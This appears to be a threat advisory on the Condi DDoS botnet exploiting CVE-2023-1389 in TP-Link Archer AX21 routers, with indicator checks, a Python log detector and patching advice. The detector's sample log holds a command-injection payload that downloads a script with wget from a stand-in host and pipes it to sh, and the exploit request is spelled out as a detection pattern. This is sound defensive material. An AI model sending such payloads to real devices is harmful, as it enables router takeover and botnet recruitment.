New Condi Malware Hijacking TP-Link Wi-Fi Routers for DDoS Botnet Attacks

Cyber Security Threat Summary:
“A new malware called Condi has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet. Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel called Condi Network to advertise their warez. ‘The Telegram channel was started in May 2022, and the threat actor has been monetizing its botnet by providing DDoS-as-a-service and selling the malware source code,’ security researchers Joie Salvio and Roy Tay said. An analysis of the malware artifact reveals its ability to terminate other competing botnets on the same host. It, however, lacks a persistence mechanism, meaning the program cannot survive a system reboot” (The Hacker News, 2023).

Because it has no persistence mechanism, Condi instead tries to keep its access for as long as possible by deleting the binaries used to shut down or reboot the device:

  • /usr/sbin/reboot
  • /usr/bin/reboot
  • /usr/sbin/shutdown
  • /usr/bin/shutdown
  • /usr/sbin/poweroff
  • /usr/bin/poweroff
  • /usr/sbin/halt
  • /usr/bin/halt
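A quick check for this indicator, written as an added example for this summary (it is not code from the article or from Fortinet's report): it lists which of the eight paths above are absent, either on the live device or under an extracted or mounted firmware root passed as the first argument. The argument and function names are assumptions for illustration.

```shell
# Added example, not code from the article or from Fortinet's report: check
# whether the reboot/shutdown binaries that Condi deletes are still present.
# ROOT (first argument) is an optional prefix so the check can be run against
# a mounted or extracted firmware image instead of the live device; it
# defaults to "" (the live root filesystem).

CONDI_DELETED_BINARIES="/usr/sbin/reboot /usr/bin/reboot
/usr/sbin/shutdown /usr/bin/shutdown
/usr/sbin/poweroff /usr/bin/poweroff
/usr/sbin/halt /usr/bin/halt"

# Print each listed path that is absent under ROOT, one per line.
# -e follows symlinks (on BusyBox firmware these are usually links to
# /bin/busybox); -L additionally treats a dangling link as present, so
# only a truly removed entry is reported.
list_missing_condi_binaries() {
    root="${1:-}"
    for p in $CONDI_DELETED_BINARIES; do
        if [ ! -e "${root}${p}" ] && [ ! -L "${root}${p}" ]; then
            printf '%s\n' "${root}${p}"
        fi
    done
}

# Print the number of missing paths (0 means all eight are present).
count_missing_condi_binaries() {
    count=$(list_missing_condi_binaries "${1:-}" | wc -l)
    echo $((count))
}

# Example usage against a dumped firmware root:
#   list_missing_condi_binaries /mnt/rootfs
#   count_missing_condi_binaries /mnt/rootfs
```

A missing path is an indicator, not proof: many firmware images never ship some of these names (a build may only have /sbin/reboot), so compare the result against a known-good image of the same firmware version rather than treating any non-zero count as an infection.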

    Security Officer Comments:
    Botnets typically propagate by brute-forcing router logins or by exploiting known vulnerabilities. Condi ships a scanner module that looks for TP-Link Archer AX21 devices vulnerable to CVE-2023-1389, an unauthenticated command-injection bug in the router's web management interface that Mirai variants had already been exploiting. When a vulnerable device is found, the exploit makes it download and run a shell script from a remote server; the script in turn fetches the bot binaries, which connect to the attacker's command-and-control (C2) server and await tasking. Once enough devices have been compromised, the operator can use them to launch high-volume DDoS attacks against targeted websites and services.
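    The exploitation step above leaves a recognizable request in the router's (or an upstream proxy's) access log. The following detector is an added example for this summary, not code from the article or from Fortinet's report. It assumes, based on public advisories rather than anything on this page, that CVE-2023-1389 is reached through the LuCI locale handler (a path ending in /locale with form=country and operation=write) with the injected command carried in the country parameter; the log lines it scans are constructed samples in combined log format, not real captures.

```python
"""Flag CVE-2023-1389-style requests in access logs and extract payload hosts.

Added example, not from the article or Fortinet's report. Request shape
(locale endpoint, form=country, operation=write, command in `country`) is
an assumption taken from public advisories. Sample log lines are constructed.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# One combined-log-format line: ip ident user [ts] "METHOD target HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
LOCALE_PATH = "/locale"                       # assumed vulnerable handler
SHELL_META = re.compile(r"\$\(|`|;|\|\||&&|\n")  # command-substitution / chaining
URL_IN_PAYLOAD = re.compile(r"https?://[^\s'\"`;)|&<>]+")

# Constructed sample log (not a real capture); RFC 5737 documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jun/2023:10:14:22 +0000] "POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://203.0.113.9/t.sh+-O-|sh) HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jun/2023:10:14:25 +0000] "POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=US HTTP/1.1" 200 52 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jun/2023:10:15:01 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=read HTTP/1.1" 200 110 "-" "curl/7.88.1"
192.0.2.44 - - [01/Jun/2023:10:15:03 +0000] "GET / HTTP/1.1" 200 4013 "-" "curl/7.88.1"
"""


def parse_query(query):
    """Split on '&' only (never ';', which the injected command may contain)
    and percent/plus-decode keys and values; first occurrence wins."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def classify_request(target):
    """Return (verdict, country_value, urls) for one request target.

    verdict: 'exploit' if the country parameter carries shell metacharacters,
             'write'   if the locale endpoint was written to without a visible
                       injection (low signal alone; legitimate admins do this,
                       but from an external source it is still worth a look),
             None      if the request is unrelated to this endpoint.
    """
    parts = urlsplit(target)
    if not parts.path.endswith(LOCALE_PATH):
        return None, None, []
    params = parse_query(parts.query)
    if params.get("form") != "country" or params.get("operation") != "write":
        return None, None, []
    country = params.get("country", "")
    if SHELL_META.search(country):
        return "exploit", country, URL_IN_PAYLOAD.findall(country)
    return "write", country, []


def scan_log(lines):
    """Parse combined-format lines and return findings for the locale endpoint."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        verdict, payload, urls = classify_request(m["target"])
        if verdict:
            findings.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                             "status": m["status"], "verdict": verdict,
                             "payload": payload, "urls": urls})
    return findings


def payload_hosts(findings):
    """Distinct hosts the injected commands fetch from: candidate IOCs."""
    return sorted({urlsplit(u).hostname for f in findings for u in f["urls"]})


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"{f['ts']} {f['ip']} {f['verdict']:7} {f['payload']!r} {f['urls']}")
    print("payload hosts:", payload_hosts(found))
```

    The decoded country value is kept in each finding so the download URL and any follow-on commands can be hunted for elsewhere; the hosts returned by payload_hosts are the ones to compare against the Fortinet IOC list linked below.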

    Suggested Correction(s):
    Although the article names one manufacturer and model, the underlying issue is wider than TP-Link: consumer and SOHO router firmware is commonly built from open-source components such as OpenWrt and its LuCI web interface, so organizations that keep a software bill of materials for their network equipment should check it for those components regardless of brand, and everyone should check for and apply available firmware updates. TP-Link fixed CVE-2023-1389 in Archer AX21 firmware 1.1.4 Build 20230219; devices on older builds remain exposed. Because Condi has no persistence mechanism, power-cycling an infected router removes the running malware, but an unpatched device reachable from the internet will simply be reinfected by the next scan, so update (or take the device offline) first and reboot afterwards; since the malware deletes the reboot and shutdown binaries, a physical power cycle may be the only way to restart it. Finally, apply standard hardening before putting equipment into production: disable WAN-side remote management, replace default credentials, and restrict administrative access to trusted networks.

    IOCs:
    https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389

    Link(s):
    https://thehackernews.com/2023/06/new-condi-malware-hijacking-tp-link-wi.html